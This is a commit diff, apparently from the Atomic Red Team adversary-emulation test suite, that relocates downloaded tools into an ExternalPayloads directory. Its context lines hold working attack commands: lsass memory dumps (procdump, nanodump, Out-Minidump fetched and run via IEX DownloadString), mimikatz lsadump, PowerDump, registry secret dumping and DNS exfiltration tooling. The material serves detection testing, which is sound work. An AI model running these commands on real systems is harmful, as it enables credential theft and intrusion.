use ExternalPayloads directory (#2460)

* use ExternalPayloads directory

* use ExternalPayloads directory

* use ExternalPayloads directory

atomics/T1003.001/T1003.001.yaml

@@ -20,7 +20,7 @@ atomic_tests:
     procdump_exe:
       description: Path of Procdump executable
       type: path
-      default: PathToAtomicsFolder\T1003.001\bin\procdump.exe
+      default: PathToAtomicsFolder\..\ExternalPayloads\procdump.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -29,10 +29,11 @@ atomic_tests:
       if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
     get_prereq_command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
-      Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
+      Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip PathToAtomicsFolder\..\ExternalPayloads\Procdump -Force
       New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
-      Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
+      Copy-Item PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe #{procdump_exe} -Force
   executor:
     command: |
       #{procdump_exe} -accepteula -ma lsass.exe #{output_file}
@@ -70,7 +71,7 @@ atomic_tests:
     dumpert_exe:
       description: Path of Dumpert executable
       type: path
-      default: PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe
+      default: PathToAtomicsFolder\..\ExternalPayloads\Outflank-Dumpert.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -102,12 +103,13 @@ atomic_tests:
   dependency_executor_name: powershell
   dependencies:
   - description: |
-      NanoDump executable must exist on disk at specified location ($env:TEMP\nanodump.x64.exe)
+      NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe)
     prereq_command: |
-      if (Test-Path $env:TEMP\nanodump.x64.exe) {exit 0} else {exit 1}
+      if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1}
     get_prereq_command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "$env:TEMP\nanodump.x64.exe"
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
   executor:
     command: |
       %temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp"
@@ -151,7 +153,7 @@ atomic_tests:
     mimikatz_exe:
       description: Path of the Mimikatz binary
       type: string
-      default: PathToAtomicsFolder\T1003.001\bin\x64\mimikatz.exe
+      default: PathToAtomicsFolder\..\ExternalPayloads\x64\mimikatz.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -219,7 +221,7 @@ atomic_tests:
   description: |
     The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
     powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
-    Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp.
+    Upon successful execution, you should see the following file created $env:TEMP\lsass_*.dmp.
     
     Author of Out-Minidump: Matthew Graeber (@mattifestation)
   supported_platforms:
@@ -227,6 +229,7 @@ atomic_tests:
   executor:
     command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
       IEX (New-Object Net.WebClient).DownloadString('https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1'); get-process lsass | Out-Minidump
     cleanup_command: |
       Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
@@ -251,7 +254,7 @@ atomic_tests:
     procdump_exe:
       description: Path of Procdump executable
       type: path
-      default: PathToAtomicsFolder\T1003.001\bin\procdump.exe
+      default: PathToAtomicsFolder..\ExternalPayloads\procdump.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -259,10 +262,11 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
-      Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
+      Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip PathToAtomicsFolder\..\ExternalPayloads\Procdump -Force
       New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
-      Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
+      Copy-Item PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe #{procdump_exe} -Force
   executor:
     command: |
       #{procdump_exe} -accepteula -mm lsass.exe #{output_file}

atomics/T1003.002/T1003.002.yaml

@@ -91,13 +91,13 @@ atomic_tests:
   - windows
   dependencies:
   - description: PowerDump script must exist on disk at specified location
-    prereq_command: 'if (Test-Path "$Env:Temp\PowerDump.ps1") {exit 0} else {exit 1} '
+    prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1} '
     get_prereq_command: |-
-      Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
+      Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
   executor:
     command: |-
       Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
-      Import-Module "$Env:Temp\PowerDump.ps1"
+      Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
       Invoke-PowerDump
     name: powershell
     elevation_required: true

atomics/T1003.004/T1003.004.yaml

@@ -14,16 +14,16 @@ atomic_tests:
     psexec_exe:
       description: Path to PsExec executable
       type: path
-      default: PathToAtomicsFolder\T1003.004\bin\PsExec.exe
+      default: PathToAtomicsFolder\..\ExternalPayloads\T1003.004\bin\PsExec.exe
   dependency_executor_name: powershell
   dependencies:
   - description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})
     prereq_command: 'if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}'
     get_prereq_command: |-
-      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PSTools.zip"
-      Expand-Archive $env:TEMP\PSTools.zip $env:TEMP\PSTools -Force
+      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PSTools.zip"
+      Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\PSTools.zip PathToAtomicsFolder\..\ExternalPayloads\PSTools -Force
       New-Item -ItemType Directory (Split-Path #{psexec_exe}) -Force | Out-Null
-      Copy-Item $env:TEMP\PSTools\PsExec.exe #{psexec_exe} -Force
+      Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PSTools\PsExec.exe #{psexec_exe} -Force
   executor:
     command: '#{psexec_exe} -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y'
     cleanup_command: del %temp%\secrets >nul 2> nul

atomics/T1021.002/T1021.002.yaml

@@ -69,7 +69,7 @@ atomic_tests:
     psexec_exe:
       description: Path to PsExec
       type: string
-      default: C:\PSTools\PsExec.exe
+      default: PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -77,10 +77,11 @@ atomic_tests:
     prereq_command: |
       if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
-      Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
+      Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip PathToAtomicsFolder\..\ExternalPayloads\PsTools -Force
       New-Item -ItemType Directory (Split-Path "#{psexec_exe}") -Force | Out-Null
-      Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
+      Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe "#{psexec_exe}" -Force
   executor:
     command: |
       #{psexec_exe} #{remote_host} -accepteula -c #{command_path}

atomics/T1021.006/T1021.006.yaml

@@ -52,8 +52,9 @@ atomic_tests:
   - description: Computer must have Ruby Installed
     prereq_command: try {if (ruby -v) {exit 0} else {exit 1}} catch {exit 1}
     get_prereq_command: |-
-      Invoke-WebRequest  -OutFile $env:Temp\rubyinstaller-2.7.1-1-x64.exe https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-2.7.1-1/rubyinstaller-2.7.1-1-x64.exe
-      $file1= $env:Temp + "\rubyinstaller-2.7.1-1-x64.exe"
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest  -OutFile PathToAtomicsFolder\..\ExternalPayloads\rubyinstaller-2.7.1-1-x64.exe https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-2.7.1-1/rubyinstaller-2.7.1-1-x64.exe
+      $file1= "PathToAtomicsFolder\..\ExternalPayloads\rubyinstaller-2.7.1-1-x64.exe"
       Start-Process $file1 /S;
   - description: Computer must have Evil-WinRM installed
     prereq_command: try {if (evil-winrm -h) {exit 0} else {exit 1}} catch {exit 1}

atomics/T1027/T1027.yaml

@@ -101,13 +101,14 @@ atomic_tests:
   dependency_executor_name: powershell
   dependencies:
   - description: |
-      T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe
+      T1027.exe must exist on disk at PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe
     prereq_command: |
-      if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1}
+      if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1}
     get_prereq_command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027.zip"
-      Expand-Archive -path "$env:temp\T1027.zip" -DestinationPath "$env:temp\temp_T1027.zip\" -Force
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "#{url_path}" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1027.zip"
+      Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\T1027.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\" -Force
   executor:
     command: |
       "%temp%\temp_T1027.zip\T1027.exe"
@@ -230,13 +231,13 @@ atomic_tests:
   dependency_executor_name: powershell
   dependencies:
   - description: |
-      T1027.js must exist on disk at $env:temp\temp_T1027js.zip\T1027js.js
+      T1027.js must exist on disk at PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js
     prereq_command: |
-      if (Test-Path $env:temp\temp_T1027js.zip\T1027js.js) {exit 0} else {exit 1}
+      if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js) {exit 0} else {exit 1}
     get_prereq_command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027js.zip"
-      Expand-Archive -path "$env:temp\T1027js.zip" -DestinationPath "$env:temp\temp_T1027js.zip\" -Force
+      Invoke-WebRequest "#{url_path}" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1027js.zip"
+      Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\T1027js.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\" -Force
   executor:
     command: |
       "%temp%\temp_T1027js.zip\T1027js.js"

atomics/T1040/T1040.yaml

@@ -91,14 +91,16 @@ atomic_tests:
       tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe".
     prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}
-      Start-Process $env:temp\wireshark_installer.exe /S
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\wireshark_installer.exe #{wireshark_url}
+      Start-Process PathToAtomicsFolder\..\ExternalPayloads\wireshark_installer.exe /S
   - description: |
       npcap must be installed.
     prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url}
-      Start-Process $env:temp\npcap_installer.exe
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\npcap_installer.exe #{npcap_url}
+      Start-Process PathToAtomicsFolder\..\ExternalPayloads\npcap_installer.exe
   executor:
     command: |
       "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5

atomics/T1046/T1046.yaml

@@ -88,8 +88,9 @@ atomic_tests:
       NMap must be installed
     prereq_command: 'if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}'
     get_prereq_command: |
-      Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url}
-      Start-Process $env:temp\nmap-7.80-setup.exe /S
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\nmap-7.80-setup.exe #{nmap_url}
+      Start-Process PathToAtomicsFolder\..\ExternalPayloads\nmap-7.80-setup.exe /S
   executor:
     command: |-
       nmap #{host_to_scan}

atomics/T1047/T1047.yaml

@@ -163,7 +163,7 @@ atomic_tests:
     dll_to_execute:
       description: Path to DLL.
       type: string
-      default: $env:TEMP\calc.dll
+      default: PathToAtomicsFolder\..\ExternalPayloads\calc.dll
     function_to_execute:
       description: Name of DLL function to call
       type: string
@@ -173,6 +173,7 @@ atomic_tests:
   - description: DLL with function to execute must exist on disk at specified location (#{dll_to_execute})
     prereq_command: 'if (Test-Path #{dll_to_execute}) {exit 0} else {exit 1}'
     get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
       Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true" -OutFile "#{dll_to_execute}"
   executor:
     command: |
@@ -199,12 +200,12 @@ atomic_tests:
   - description: TightVNC must be installed.
     prereq_command: if ((Test-Path "C:\Program Files\TightVNC\tvnviewer.exe")-Or (Test-Path "C:\Program Files (x86)\TightVNC\tvnviewer.exe")) {exit 0} else {exit 1}
     get_prereq_command: |-
-      Invoke-WebRequest 'https://www.tightvnc.com/download/2.8.63/tightvnc-2.8.63-gpl-setup-64bit.msi' -OutFile PathToAtomicsFolder\T1047\bin\tightvncinstaller.msi
+      Invoke-WebRequest 'https://www.tightvnc.com/download/2.8.63/tightvnc-2.8.63-gpl-setup-64bit.msi' -OutFile "PathToAtomicsFolder..\ExternalPayloads\tightvncinstaller.msi"
       start-sleep -s 10
-      msiexec /i PathToAtomicsFolder\T1047\bin\tightvncinstaller.msi /qn /norestart
+      msiexec /i "PathToAtomicsFolder..\ExternalPayloads\tightvncinstaller.msi" /qn /norestart
       start-sleep -s 15
   executor:
     command: wmic /node:"#{node}" product where "name like '#{product}%%'" call uninstall
-    cleanup_command: msiexec /i PathToAtomicsFolder\T1047\bin\tightvncinstaller.msi /qn /norestart
+    cleanup_command: msiexec /i "PathToAtomicsFolder..\ExternalPayloads\tightvncinstaller.msi" /qn /norestart
     name: command_prompt
     elevation_required: true

atomics/T1048.002/T1048.002.yaml

@@ -23,11 +23,10 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{curl_path}) {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip
-      Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
-      Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe
-      Remove-Item $env:temp\curl
-      Remove-Item $env:temp\curl.zip
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip
+      Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\curl.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\curl
+      Copy-Item PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe
   - description: |
       #{input_file} must be exist on system.
     prereq_command: |

atomics/T1048/T1048.yaml

@@ -69,7 +69,7 @@ atomic_tests:
     ps_module:
       description: DNSExfiltrator powershell ps_module
       type: path
-      default: '$env:Temp\dnsexfil.ps1'
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\dnsexfil.ps1'
     doh:
       description: Google or CloudFlare DoH (DNS over HTTP) server
       type: string
@@ -89,6 +89,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{ps_module}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
       IWR "https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416fffd5b4d42a7aa00526ca8/Invoke-DNSExfiltrator.ps1" -OutFile #{ps_module}
   executor:
     command: |

atomics/T1055/T1055.yaml

@@ -64,7 +64,7 @@ atomic_tests:
     psexec_path:
       description: Path to PsExec
       type: string
-      default: C:\PSTools\PsExec.exe
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe'
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -86,10 +86,11 @@ atomic_tests:
       if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
     get_prereq_command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" -UseBasicParsing
-      Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" -UseBasicParsing
+      Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip PathToAtomicsFolder\..\ExternalPayloads\PsTools -Force
       New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
-      Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force
+      Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe "#{psexec_path}" -Force
   executor:
     command: |
       #{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit"

atomics/T1059.003/T1059.003.yaml

@@ -15,7 +15,7 @@ atomic_tests:
     script_path:
       description: Script path.
       type: path
-      default: $env:TEMP\T1059.003_script.bat
+      default: PathToAtomicsFolder\..\ExternalPayloads\T1059.003_script.bat
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -83,7 +83,7 @@ atomic_tests:
     file_to_print:
       description: File to be opened/printed by Wordpad.
       type: string
-      default: $env:temp\T1059_003note.txt
+      default: PathToAtomicsFolder\..\ExternalPayloads\T1059_003note.txt
     max_to_print:
       description: The maximum number of Wordpad windows the test will open/print.
       type: integer

atomics/T1069.001/T1069.001.yaml

@@ -55,7 +55,7 @@ atomic_tests:
     sharphound_path:
       description: SharpHound Windows executable
       type: path
-      default: '$env:TEMP\SharpHound.exe'
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\SharpHound.exe'
     output_path:
       description: Output for SharpHound
       type: path
@@ -68,6 +68,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path "#{sharphound_path}") { exit 0 } else { exit 1 }
     get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
       Invoke-WebRequest "https://github.com/BloodHoundAD/BloodHound/blob/e062fe73d73c015dccb37fae5089342d009b84b8/Collectors/SharpHound.exe?raw=true" -OutFile "#{sharphound_path}"
   executor:
     name: powershell

atomics/T1070.006/T1070.006.yaml

@@ -123,7 +123,7 @@ atomic_tests:
     file_path:
       description: Path of file to change creation timestamp
       type: path
-      default: $env:TEMP\T1551.006_timestomp.txt
+      default: PathToAtomicsFolder\..\ExternalPayloads\T1551.006_timestomp.txt
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -152,7 +152,7 @@ atomic_tests:
     file_path:
       description: Path of file to change modified timestamp
       type: path
-      default: $env:TEMP\T1551.006_timestomp.txt
+      default: PathToAtomicsFolder\..\ExternalPayloads\T1551.006_timestomp.txt
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -181,7 +181,7 @@ atomic_tests:
     file_path:
       description: Path of file to change last access timestamp
       type: path
-      default: $env:TEMP\T1551.006_timestomp.txt
+      default: PathToAtomicsFolder\..\ExternalPayloads\T1551.006_timestomp.txt
   dependency_executor_name: powershell
   dependencies:
   - description: |

atomics/T1071.001/T1071.001.yaml

@@ -47,11 +47,12 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{curl_path}) {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip
-      Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
-      Copy-Item $env:temp\curl\curl-7.71.1-win32-mingw\bin\curl.exe #{curl_path}
-      Remove-Item $env:temp\curl
-      Remove-Item $env:temp\curl.zip
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip
+      Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\curl.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\curl
+      Copy-Item PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.71.1-win32-mingw\bin\curl.exe #{curl_path}
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\curl
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\curl.zip
   executor:
     command: |
       #{curl_path} -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1

atomics/T1072/T1072.yaml

@@ -24,9 +24,10 @@ atomic_tests:
       if (Test-Path "${env:ProgramFiles(x86)}/#{radmin_exe}") {exit 0} else {exit 1}
     get_prereq_command: |
       Write-Host Downloading radmin installer
-      (New-Object Net.WebClient).DownloadFile("https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi","$ENV:Temp\#{radmin_installer}")
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\#{radmin_installer}"
       Write-Host Install Radmin
-      Start-Process msiexec  -Wait -ArgumentList /i , $ENV:Temp\#{radmin_installer}, /qn
+      Start-Process msiexec  -Wait -ArgumentList /i , "PathToAtomicsFolder\..\ExternalPayloads\#{radmin_installer}", /qn
   executor:
     name: command_prompt
     elevation_required: true
@@ -56,9 +57,10 @@ atomic_tests:
       if (Test-Path "${env:ProgramFiles(x86)}/#{PDQ_Deploy_exe}") {exit 0} else {exit 1}
     get_prereq_command: |
       Write-Host Downloading PDQ Deploy installer
-      (New-Object Net.WebClient).DownloadFile("https://download.pdq.com/release/19/Deploy_19.3.350.0.exe","$ENV:Temp\#{PDQ_Deploy_installer}")
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://download.pdq.com/release/19/Deploy_19.3.350.0.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\#{PDQ_Deploy_installer}"
       Write-Host Install PDQ Deploy
-      Start-Process $ENV:Temp\#{PDQ_Deploy_installer} -Wait -ArgumentList "/s"
+      Start-Process "PathToAtomicsFolder\..\ExternalPayloads\#{PDQ_Deploy_installer}" -Wait -ArgumentList "/s"
   executor:
     name: command_prompt
     elevation_required: true

atomics/T1082/T1082.yaml

@@ -304,11 +304,12 @@ atomic_tests:
   dependency_executor_name: powershell
   dependencies:
   - description: |
-      The SkyArk AzureStealth module must exist in $env:temp.
+      The SkyArk AzureStealth module must exist in PathToAtomicsFolder\..\ExternalPayloads.
     prereq_command: |
-      if (test-path $env:temp\AzureStealth.ps1){exit 0} else {exit 1}
+      if (test-path PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1){exit 0} else {exit 1}
     get_prereq_command: |
-      invoke-webrequest "https://raw.githubusercontent.com/cyberark/SkyArk/3293ee145e95061a8980dd7b5da0030edc4da5c0/AzureStealth/AzureStealth.ps1" -outfile "$env:temp\AzureStealth.ps1"
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      invoke-webrequest "https://raw.githubusercontent.com/cyberark/SkyArk/3293ee145e95061a8980dd7b5da0030edc4da5c0/AzureStealth/AzureStealth.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1"
   - description: |
       The AzureAD module must be installed.
     prereq_command: |
@@ -323,7 +324,7 @@ atomic_tests:
       Install-Module -Name Az -Force
   executor:
     command: |
-      Import-Module $env:temp\AzureStealth.ps1 -force      
+      Import-Module PathToAtomicsFolder\..\ExternalPayloads\AzureStealth.ps1 -force      
       $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
       $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
       Connect-AzAccount -Credential $Credential

atomics/T1083/T1083.yaml

@@ -129,7 +129,7 @@ atomic_tests:
     dirlister_path:
       description: 'Path to the DirLister executable '
       type: string
-      default: PathToAtomicsFolder\T1083\bin\DirLister.exe
+      default: PathToAtomicsFolder..\ExternalPayloads\DirLister.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -138,11 +138,11 @@ atomic_tests:
       if (Test-Path #{dirlister_path}) {exit 0} else {exit 1}
     get_prereq_command: |
       $parentpath = Split-Path "#{dirlister_path}"
-      Invoke-WebRequest https://github.com/SanderSade/DirLister/releases/download/v2.beta4/DirLister.v2.beta4.zip -OutFile $env:TEMP\TDirLister.v2.beta4.zip
       New-Item -ItemType Directory -Force -Path $parentpath | Out-Null
-      Expand-Archive -Path $env:TEMP\TDirLister.v2.beta4.zip -DestinationPath $env:TEMP\TDirLister.v2.beta4 -Force
-      Copy-Item $env:TEMP\TDirLister.v2.beta4\* $parentpath -Recurse
-      Remove-Item $env:TEMP\TDirLister.v2.beta4.zip,$env:TEMP\TDirLister.v2.beta4 -Recurse -ErrorAction Ignore
+      Invoke-WebRequest https://github.com/SanderSade/DirLister/releases/download/v2.beta4/DirLister.v2.beta4.zip -OutFile PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip
